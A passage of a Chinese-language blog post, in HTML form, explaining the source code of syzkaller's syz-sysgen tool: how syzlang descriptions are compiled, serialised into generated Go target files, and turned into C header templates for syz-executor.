&#123;</span><br><span class="line">    job.Unsupported[what] = <span class="literal">true</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>返回的 Prog 结构体声明如下：</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Kiprey: in function `processJob`</span></span><br><span class="line"> </span><br><span class="line"><span class="comment">// Prog is description compilation result.</span></span><br><span class="line"><span class="keyword">type</span> Prog <span class="keyword">struct</span> &#123;</span><br><span class="line">    Resources []*prog.ResourceDesc</span><br><span class="line">    Syscalls  []*prog.Syscall</span><br><span class="line">    Types     []prog.Type</span><br><span class="line">    <span class="comment">// Set of unsupported syscalls/flags.</span></span><br><span class="line">    Unsupported <span class="keyword">map</span>[<span class="type">string</span>]<span class="type">bool</span></span><br><span class="line">    <span class="comment">// Returned if consts was nil.</span></span><br><span class="line">    fileConsts <span class="keyword">map</span>[<span class="type">string</span>]*ConstInfo</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>编译操作和先前 syz-extract 类似，不同的是这次提供了 consts 信息，因此会执行完整的编译过程，分析 syzlang 代码中描述的<strong>全部 syscall 参数类型信息</strong>。返回的 Prog 结构体中：</p><ul><li>字段 fileConsts 为空</li><li>涉及到的类型信息保存在了 Resource 和 Types 字段</li><li>syscall 的描述则存放在 Syscalls 字段中。</li></ul><p>之后便是将分析结果，序列化为 go 语言源代码，留待后续 syz-fuzzer 所使用；序列化后的 golang 代码存放至 <code>sys/&lt;OS&gt;/gen/&lt;arch&gt;.go</code>，例如 <code>sys/linux/gen/amd64.go</code>（<strong>loc: ~11w</strong>）：</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Kiprey: in function `processJob`</span></span><br><span class="line">sysFile := filepath.Join(*outDir, <span class="string">&quot;sys&quot;</span>, job.Target.OS, <span class="string">&quot;gen&quot;</span>, job.Target.Arch+<span class="string">&quot;.go&quot;</span>)</span><br><span class="line">out := <span class="built_in">new</span>(bytes.Buffer)</span><br><span class="line"><span class="comment">// generate 执行 golang 序列化操作</span></span><br><span class="line">generate(job.Target, prog, consts, out)</span><br><span class="line">rev := hash.String(out.Bytes())</span><br><span class="line">fmt.Fprintf(out, <span class="string">&quot;const revision_%v = %q\n&quot;</span>, job.Target.Arch, rev)</span><br><span class="line">writeSource(sysFile, out.Bytes())</span><br></pre></td></tr></table></figure><p>我们来看看生成出的 golang 代码是什么样的（以 <code>/sys/linux/gen/amd64.go</code> 为例）：</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// AUTOGENERATED FILE</span></span><br><span class="line"><span class="comment">// +build !codeanalysis</span></span><br><span class="line"><span class="comment">// +build !syz_target syz_target,syz_os_linux,syz_arch_amd64</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">package</span> gen</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> . <span class="string">&quot;github.com/google/syzkaller/prog&quot;</span></span><br><span class="line"><span class="keyword">import</span> . <span class="string">&quot;github.com/google/syzkaller/sys/linux&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">init</span><span class="params">()</span></span> &#123;</span><br><span class="line">    RegisterTarget(&amp;Target&#123;OS: <span class="string">&quot;linux&quot;</span>, Arch: <span class="string">&quot;amd64&quot;</span>, Revision: revision_amd64, PtrSize: <span class="number">8</span>, PageSize: <span class="number">4096</span>, NumPages: <span class="number">4096</span>, DataOffset: <span class="number">536870912</span>, LittleEndian: <span class="literal">true</span>, ExecutorUsesShmem: <span class="literal">true</span>, Syscalls: syscalls_amd64, Resources: resources_amd64, Consts: consts_amd64&#125;, types_amd64, InitTarget)</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> resources_amd64 = []*ResourceDesc&#123;</span><br><span class="line">&#123;Name:<span class="string">&quot;ANYRES16&quot;</span>,Kind:[]<span class="type">string</span>&#123;<span class="string">&quot;ANYRES16&quot;</span>&#125;,Values:[]<span class="type">uint64</span>&#123;<span class="number">18446744073709551615</span>,<span class="number">0</span>&#125;&#125;,</span><br><span class="line">&#123;Name:<span class="string">&quot;ANYRES32&quot;</span>,Kind:[]<span class="type">string</span>&#123;<span class="string">&quot;ANYRES32&quot;</span>&#125;,Values:[]<span class="type">uint64</span>&#123;<span class="number">18446744073709551615</span>,<span class="number">0</span>&#125;&#125;,</span><br><span class="line">&#123;Name:<span class="string">&quot;ANYRES64&quot;</span>,Kind:[]<span class="type">string</span>&#123;<span class="string">&quot;ANYRES64&quot;</span>&#125;,Values:[]<span class="type">uint64</span>&#123;<span class="number">18446744073709551615</span>,<span class="number">0</span>&#125;&#125;,</span><br><span class="line">&#123;Name:<span class="string">&quot;IMG_DEV_VIRTADDR&quot;</span>,Kind:[]<span class="type">string</span>&#123;<span class="string">&quot;IMG_DEV_VIRTADDR&quot;</span>&#125;,Values:[]<span class="type">uint64</span>&#123;<span class="number">0</span>&#125;&#125;,</span><br><span class="line">&#123;Name:<span class="string">&quot;IMG_HANDLE&quot;</span>,Kind:[]<span class="type">string</span>&#123;<span class="string">&quot;IMG_HANDLE&quot;</span>&#125;,Values:[]<span class="type">uint64</span>&#123;<span class="number">0</span>&#125;&#125;,</span><br><span class="line">&#123;Name:<span class="string">&quot;assoc_id&quot;</span>,Kind:[]<span class="type">string</span>&#123;<span class="string">&quot;assoc_id&quot;</span>&#125;,Values:[]<span class="type">uint64</span>&#123;<span class="number">0</span>&#125;&#125;,</span><br><span class="line">....</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> syscalls_amd64 = []*Syscall&#123;</span><br><span class="line">&#123;NR:<span class="number">43</span>,Name:<span class="string">&quot;accept&quot;</span>,CallName:<span class="string">&quot;accept&quot;</span>,Args:[]Field&#123;</span><br><span class="line">&#123;Name:<span class="string">&quot;fd&quot;</span>,Type:Ref(<span class="number">11199</span>)&#125;,</span><br><span class="line">&#123;Name:<span class="string">&quot;peer&quot;</span>,Type:Ref(<span class="number">10021</span>)&#125;,</span><br><span class="line">&#123;Name:<span class="string">&quot;peerlen&quot;</span>,Type:Ref(<span class="number">10305</span>)&#125;,</span><br><span class="line">&#125;,Ret:Ref(<span class="number">11199</span>)&#125;,</span><br><span class="line">&#123;NR:<span class="number">43</span>,Name:<span class="string">&quot;accept$alg&quot;</span>,CallName:<span class="string">&quot;accept&quot;</span>,Args:[]Field&#123;</span><br><span class="line">&#123;Name:<span class="string">&quot;fd&quot;</span>,Type:Ref(<span class="number">11202</span>)&#125;,</span><br><span class="line">&#123;Name:<span class="string">&quot;peer&quot;</span>,Type:Ref(<span class="number">4943</span>)&#125;,</span><br><span class="line">&#123;Name:<span class="string">&quot;peerlen&quot;</span>,Type:Ref(<span class="number">4943</span>)&#125;,</span><br><span class="line">&#125;,Ret:Ref(<span class="number">11203</span>)&#125;,</span><br><span class="line">&#123;NR:<span class="number">43</span>,Name:<span class="string">&quot;accept$ax25&quot;</span>,CallName:<span class="string">&quot;accept&quot;</span>,Args:[]Field&#123;</span><br><span class="line">&#123;Name:<span class="string">&quot;fd&quot;</span>,Type:Ref(<span class="number">11204</span>)&#125;,</span><br><span class="line">&#123;Name:<span class="string">&quot;peer&quot;</span>,Type:Ref(<span class="number">10033</span>)&#125;,</span><br><span class="line">&#123;Name:<span class="string">&quot;peerlen&quot;</span>,Type:Ref(<span class="number">10305</span>)&#125;,</span><br><span class="line">&#125;,Ret:Ref(<span class="number">11204</span>)&#125;,</span><br><span class="line">&#123;NR:<span class="number">43</span>,Name:<span class="string">&quot;accept$inet&quot;</span>,CallName:<span class="string">&quot;accept&quot;</span>,Args:[]Field&#123;</span><br><span class="line">&#123;Name:<span class="string">&quot;fd&quot;</span>,Type:Ref(<span class="number">11223</span>)&#125;,</span><br><span class="line">&#123;Name:<span class="string">&quot;peer&quot;</span>,Type:Ref(<span class="number">10025</span>)&#125;,</span><br><span class="line">&#123;Name:<span class="string">&quot;peerlen&quot;</span>,Type:Ref(<span class="number">10305</span>)&#125;,</span><br><span class="line">&#125;,Ret:Ref(<span class="number">11223</span>)&#125;,</span><br><span class="line">....</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> types_amd64 = []Type&#123;</span><br><span class="line">&amp;ArrayType&#123;TypeCommon:TypeCommon&#123;TypeName:<span class="string">&quot;array&quot;</span>,TypeAlign:<span class="number">1</span>,IsVarlen:<span class="literal">true</span>&#125;,Elem:Ref(<span class="number">17155</span>)&#125;,</span><br><span class="line">&amp;ArrayType&#123;TypeCommon:TypeCommon&#123;TypeName:<span class="string">&quot;array&quot;</span>,TypeAlign:<span class="number">1</span>,IsVarlen:<span class="literal">true</span>&#125;,Elem:Ref(<span class="number">14707</span>),Kind:<span class="number">1</span>,RangeEnd:<span class="number">32</span>&#125;,</span><br><span class="line">&amp;ArrayType&#123;TypeCommon:TypeCommon&#123;TypeName:<span class="string">&quot;array&quot;</span>,TypeAlign:<span class="number">1</span>,IsVarlen:<span class="literal">true</span>&#125;,Elem:Ref(<span class="number">14707</span>),Kind:<span class="number">1</span>,RangeEnd:<span class="number">8</span>&#125;,</span><br><span class="line">&amp;ArrayType&#123;TypeCommon:TypeCommon&#123;TypeName:<span class="string">&quot;array&quot;</span>,TypeAlign:<span class="number">1</span>,IsVarlen:<span class="literal">true</span>&#125;,Elem:Ref(<span class="number">14560</span>)&#125;,</span><br><span class="line">&amp;ArrayType&#123;TypeCommon:TypeCommon&#123;TypeName:<span class="string">&quot;array&quot;</span>,TypeAlign:<span class="number">1</span>,IsVarlen:<span class="literal">true</span>&#125;,Elem:Ref(<span class="number">14575</span>)&#125;,</span><br><span class="line">....</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> consts_amd64 = []ConstValue&#123;</span><br><span class="line">&#123;<span class="string">&quot;ABS_CNT&quot;</span>,<span class="number">64</span>&#125;,</span><br><span class="line">&#123;<span class="string">&quot;ABS_MAX&quot;</span>,<span class="number">63</span>&#125;,</span><br><span class="line">&#123;<span class="string">&quot;ACL_EXECUTE&quot;</span>,<span class="number">1</span>&#125;,</span><br><span class="line">&#123;<span class="string">&quot;ACL_GROUP&quot;</span>,<span class="number">8</span>&#125;,</span><br><span class="line">&#123;<span class="string">&quot;ACL_GROUP_OBJ&quot;</span>,<span class="number">4</span>&#125;,</span><br><span class="line">&#123;<span class="string">&quot;ACL_LINK&quot;</span>,<span class="number">1</span>&#125;,</span><br><span class="line">....</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">const</span> revision_amd64 = <span class="string">&quot;e61403f96ca19fc071d8e9c946b2259a2804c68e&quot;</span></span><br></pre></td></tr></table></figure><p>其中，init 函数用于将当前这个 linux amd64 的 target，注册进 <code>targets</code> 数组中以供后续 syz-fuzzer 取出使用。</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> targets = <span class="built_in">make</span>(<span class="keyword">map</span>[<span class="type">string</span>]*Target)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">RegisterTarget</span><span class="params">(target *Target, types []Type, initArch <span class="keyword">func</span>(target *Target)</span></span>) &#123;</span><br><span class="line">    key := target.OS + <span class="string">&quot;/&quot;</span> + target.Arch</span><br><span class="line">    <span class="keyword">if</span> targets[key] != <span class="literal">nil</span> &#123;</span><br><span class="line">        <span class="built_in">panic</span>(fmt.Sprintf(<span class="string">&quot;duplicate target %v&quot;</span>, key))</span><br><span class="line">    &#125;</span><br><span class="line">    target.initArch = initArch</span><br><span class="line">    target.types = types</span><br><span class="line">    targets[key] = target</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>amd64.go 内部还声明了多个数组，其中：</p><ul><li><code>resources_amd64</code> 数组：存放着每个 syzlang 代码中声明的 resource 变量</li><li><code>syscalls_amd64</code> 数组：存放着每个 syscall 所对应的名称、调用号，以及各个参数的名称和类型。</li><li><code>types_amd64</code> 数组：每个类型的具体信息，例如数组、结构体类型信息等等</li><li><code>consts_amd64</code>：存放 consts 字符串与整型的映射关系</li><li><code>revision_amd64</code>：amd64.go 源码的哈希值</li></ul><p>回到 generateExecutorSyscall 函数，该函数最后便是调用 generateExecutorSyscalls 函数来创建 Executor 的 syscall 信息，并将其返回给上层调用者（即 main 函数）：</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Kiprey: in function `processJob`</span></span><br><span class="line">job.ArchData = generateExecutorSyscalls(job.Target, prog.Syscalls, rev)</span><br><span class="line">  </span><br><span class="line"><span class="comment">// Don&#x27;t print warnings, they are printed in syz-check.</span></span><br><span class="line">job.Errors = <span class="literal">nil</span></span><br><span class="line">job.OK = <span class="literal">true</span></span><br></pre></td></tr></table></figure><p>这个信息将用于生成 syz-exexcutor 的 C 代码。</p><h3 id="3-generateExecutorSyscalls">3. generateExecutorSyscalls</h3><p>该函数的作用是，为生成 syz-executor 准备相关的 syscall 数据，因此起名神似 <strong>生成（generate） executor 的 syscall 数据</strong>。</p><p>初始时，generateExecutorSyscalls 函数创建了一个 ArchData 结构体，这个结构体将一层层返回给 main 函数。</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">data := ArchData&#123;</span><br><span class="line">    Revision:   rev,</span><br><span class="line">    GOARCH:     target.Arch,</span><br><span class="line">    PageSize:   target.PageSize,</span><br><span class="line">    NumPages:   target.NumPages,</span><br><span class="line">    DataOffset: target.DataOffset,</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">if</span> target.ExecutorUsesForkServer &#123;</span><br><span class="line">    data.ForkServer = <span class="number">1</span></span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">if</span> target.ExecutorUsesShmem &#123;</span><br><span class="line">    data.Shmem = <span class="number">1</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>如果<strong>目标 OS &amp; arch</strong> 所对应的 target 结构体，设置了对 ForkServer 和 Shmem（共享内存）的支持，则在 data 中将这两个字段设置为 true，这样 syz-executor 便可以使用这两个技术加速 fuzz 过程。</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// SyscallAttrs represents call attributes in syzlang.</span></span><br><span class="line"><span class="comment">//</span></span><br><span class="line"><span class="comment">// This structure is the source of truth for the all other parts of the system.</span></span><br><span class="line"><span class="comment">// pkg/compiler uses this structure to parse descriptions.</span></span><br><span class="line"><span class="comment">// syz-sysgen uses this structure to generate code for executor.</span></span><br><span class="line"><span class="comment">//</span></span><br><span class="line"><span class="comment">// Only bool&#x27;s and uint64&#x27;s are currently supported.</span></span><br><span class="line"><span class="comment">//</span></span><br><span class="line"><span class="comment">// See docs/syscall_descriptions_syntax.md for description of individual attributes.</span></span><br><span class="line"><span class="keyword">type</span> SyscallAttrs <span class="keyword">struct</span> &#123;</span><br><span class="line">    Disabled      <span class="type">bool</span></span><br><span class="line">    Timeout       <span class="type">uint64</span></span><br><span class="line">    ProgTimeout   <span class="type">uint64</span></span><br><span class="line">    IgnoreReturn  <span class="type">bool</span></span><br><span class="line">    BreaksReturns <span class="type">bool</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>接下来便是一个<strong>遍历 syscalls 数组中的各个 Syscall 类型结构体</strong>的 for 循环。这个 for 循环虽然看上去一眼难以看懂，但实际上，它只是将变量 c 中<strong>结构体 SyscallAttrs 里的各个字段取出，并将其依次存放至整型数组 attrVals</strong>，然后再使用生成的 attrVals 数组进一步生成 SyscallData 结构体：</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">for</span> _, c := <span class="keyword">range</span> syscalls &#123;</span><br><span class="line">    <span class="keyword">var</span> attrVals []<span class="type">uint64</span></span><br><span class="line">    attrs := reflect.ValueOf(c.Attrs)</span><br><span class="line">    last := <span class="number">-1</span></span><br><span class="line">    <span class="keyword">for</span> i := <span class="number">0</span>; i &lt; attrs.NumField(); i++ &#123;</span><br><span class="line">        attr := attrs.Field(i)</span><br><span class="line">        val := <span class="type">uint64</span>(<span class="number">0</span>)</span><br><span class="line">        <span class="keyword">switch</span> attr.Type().Kind() &#123;</span><br><span class="line">            <span class="keyword">case</span> reflect.Bool:</span><br><span class="line">            <span class="keyword">if</span> attr.Bool() &#123;</span><br><span class="line">                val = <span class="number">1</span></span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">case</span> reflect.Uint64:</span><br><span class="line">            val = attr.Uint()</span><br><span class="line">            <span class="keyword">default</span>:</span><br><span class="line">            <span class="built_in">panic</span>(<span class="string">&quot;unsupported syscall attribute type&quot;</span>)</span><br><span class="line">        &#125;</span><br><span class="line">        attrVals = <span class="built_in">append</span>(attrVals, val)</span><br><span class="line">        <span class="keyword">if</span> val != <span class="number">0</span> &#123;</span><br><span class="line">            last = i</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    data.Calls = <span class="built_in">append</span>(data.Calls, newSyscallData(target, c, attrVals[:last+<span class="number">1</span>]))</span><br><span class="line">&#125;</span><br><span class="line">sort.Slice(data.Calls, <span class="function"><span class="keyword">func</span><span class="params">(i, j <span class="type">int</span>)</span></span> <span class="type">bool</span> &#123;</span><br><span class="line">    <span class="keyword">return</span> data.Calls[i].Name &lt; data.Calls[j].Name</span><br><span class="line">&#125;)</span><br><span class="line"><span class="keyword">return</span> data</span><br></pre></td></tr></table></figure><p>以下是 data 变量中所存放信息的一个示例：</p><p><img src="/2022/03/syzkaller-1/image-20220309214932071.png" alt="image-20220309214932071"></p><p>结构体 SyscallAttrs 定义如下：</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// SyscallAttrs represents call attributes in syzlang.</span></span><br><span class="line"><span class="comment">//</span></span><br><span class="line"><span class="comment">// This structure is the source of truth for the all other parts of the system.</span></span><br><span class="line"><span class="comment">// pkg/compiler uses this structure to parse descriptions.</span></span><br><span class="line"><span class="comment">// syz-sysgen uses this structure to generate code for executor.</span></span><br><span class="line"><span class="comment">//</span></span><br><span class="line"><span class="comment">// Only bool&#x27;s and uint64&#x27;s are currently supported.</span></span><br><span class="line"><span class="comment">//</span></span><br><span class="line"><span class="comment">// See docs/syscall_descriptions_syntax.md for description of individual attributes.</span></span><br><span class="line"><span class="keyword">type</span> SyscallAttrs <span class="keyword">struct</span> &#123;</span><br><span class="line">    Disabled      <span class="type">bool</span></span><br><span class="line">    Timeout       <span class="type">uint64</span></span><br><span class="line">    ProgTimeout   <span class="type">uint64</span></span><br><span class="line">    IgnoreReturn  <span class="type">bool</span></span><br><span class="line">    BreaksReturns <span class="type">bool</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>以上图所示，由于当前遍历的 SyscallAttrs 结构体（也就是变量 attrs）的值全为默认值0，因此取出来的 Attrs 数组中各元素也为 0:</p><p><img src="/2022/03/syzkaller-1/image-20220309215426959.png" alt="image-20220309215426959"></p><p>该 for 循环会一次次的将遍历到的 syscall 对应的 SyscallData 添加进<code>data.Calls</code>，其中 <code>newSyscallData</code> 函数所生成的 SyscallData 结构体定义如下：</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// sys/syz-sysgen/sysgen.go</span></span><br><span class="line"><span class="keyword">type</span> SyscallData <span class="keyword">struct</span> &#123;</span><br><span class="line">    Name     <span class="type">string</span>      <span class="comment">// syzlang 中的调用名，例如 accept$inet</span></span><br><span class="line">    CallName <span class="type">string</span>      <span class="comment">// 实际的 syscall 调用名，例如 accept</span></span><br><span class="line">    NR       <span class="type">int32</span>       <span class="comment">// syscall 对应的调用号，例如 30</span></span><br><span class="line">    NeedCall <span class="type">bool</span>        <span class="comment">// 一个用于后续的 syz-executor 源码生成的标志，后面会提到</span></span><br><span class="line">    Attrs    []<span class="type">uint64</span>    <span class="comment">// 存放分析 syzlang 所生成的 SyscallAttrs 数据数组</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>待整个 for 循环完成后，generateExecutorSyscall 函数将会把上面所生成的 data.Calls 数组进行排序，并返回 data 变量。</p><h3 id="4-writeExecutorSyscalls">4. writeExecutorSyscalls</h3><p>作用：该函数将生成 syz-executor 所使用的 C 代码头文件。</p><p>通读一下代码可以很容易的发现，该函数将会尝试填充两个 C 代码模板，并将填充后的 C 代码输出至 <code>executor/defs.h</code> 和 <code>executor/syscalls.h</code>。</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">writeExecutorSyscalls</span><span class="params">(data *ExecutorData)</span></span> &#123;</span><br><span class="line">    osutil.MkdirAll(filepath.Join(*outDir, <span class="string">&quot;executor&quot;</span>))</span><br><span class="line">    sort.Slice(data.OSes, <span class="function"><span class="keyword">func</span><span class="params">(i, j <span class="type">int</span>)</span></span> <span class="type">bool</span> &#123;</span><br><span class="line">        <span class="keyword">return</span> data.OSes[i].GOOS &lt; data.OSes[j].GOOS</span><br><span class="line">    &#125;)</span><br><span class="line">    buf := <span class="built_in">new</span>(bytes.Buffer)</span><br><span class="line">    <span class="keyword">if</span> err := defsTempl.Execute(buf, data); err != <span class="literal">nil</span> &#123;</span><br><span class="line">        tool.Failf(<span class="string">&quot;failed to execute defs template: %v&quot;</span>, err)</span><br><span class="line">    &#125;</span><br><span class="line">    writeFile(filepath.Join(*outDir, <span class="string">&quot;executor&quot;</span>, <span class="string">&quot;defs.h&quot;</span>), buf.Bytes())</span><br><span class="line">    buf.Reset()</span><br><span class="line">    <span class="keyword">if</span> err := syscallsTempl.Execute(buf, data); err != <span class="literal">nil</span> &#123;</span><br><span class="line">        tool.Failf(<span class="string">&quot;failed to execute syscalls template: %v&quot;</span>, err)</span><br><span class="line">    &#125;</span><br><span class="line">    writeFile(filepath.Join(*outDir, <span class="string">&quot;executor&quot;</span>, <span class="string">&quot;syscalls.h&quot;</span>), buf.Bytes())</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>其中，defsTempl 代码模板如下：</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> defsTempl = template.Must(template.New(<span class="string">&quot;&quot;</span>).Parse(<span class="string">`// AUTOGENERATED FILE</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">struct call_attrs_t &#123; &#123;&#123;range $attr := $.CallAttrs&#125;&#125;</span></span><br><span class="line"><span class="string">    uint64_t &#123;&#123;$attr&#125;&#125;;&#123;&#123;end&#125;&#125;</span></span><br><span class="line"><span class="string">&#125;;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">struct call_props_t &#123; &#123;&#123;range $attr := $.CallProps&#125;&#125;</span></span><br><span class="line"><span class="string">    &#123;&#123;$attr.Type&#125;&#125; &#123;&#123;$attr.Name&#125;&#125;;&#123;&#123;end&#125;&#125;</span></span><br><span class="line"><span class="string">&#125;;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">#define read_call_props_t(var, reader) &#123; \&#123;&#123;range $attr := $.CallProps&#125;&#125;</span></span><br><span class="line"><span class="string">    (var).&#123;&#123;$attr.Name&#125;&#125; = (&#123;&#123;$attr.Type&#125;&#125;)(reader); \&#123;&#123;end&#125;&#125;</span></span><br><span class="line"><span class="string">&#125;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">&#123;&#123;range $os := $.OSes&#125;&#125;</span></span><br><span class="line"><span class="string">#if GOOS_&#123;&#123;$os.GOOS&#125;&#125;</span></span><br><span class="line"><span class="string">#define GOOS &quot;&#123;&#123;$os.GOOS&#125;&#125;&quot;</span></span><br><span class="line"><span class="string">&#123;&#123;range $arch := $os.Archs&#125;&#125;</span></span><br><span class="line"><span class="string">#if GOARCH_&#123;&#123;$arch.GOARCH&#125;&#125;</span></span><br><span class="line"><span class="string">#define GOARCH &quot;&#123;&#123;.GOARCH&#125;&#125;&quot;</span></span><br><span class="line"><span class="string">#define SYZ_REVISION &quot;&#123;&#123;.Revision&#125;&#125;&quot;</span></span><br><span class="line"><span class="string">#define SYZ_EXECUTOR_USES_FORK_SERVER &#123;&#123;.ForkServer&#125;&#125;</span></span><br><span class="line"><span class="string">#define SYZ_EXECUTOR_USES_SHMEM &#123;&#123;.Shmem&#125;&#125;</span></span><br><span class="line"><span class="string">#define SYZ_PAGE_SIZE 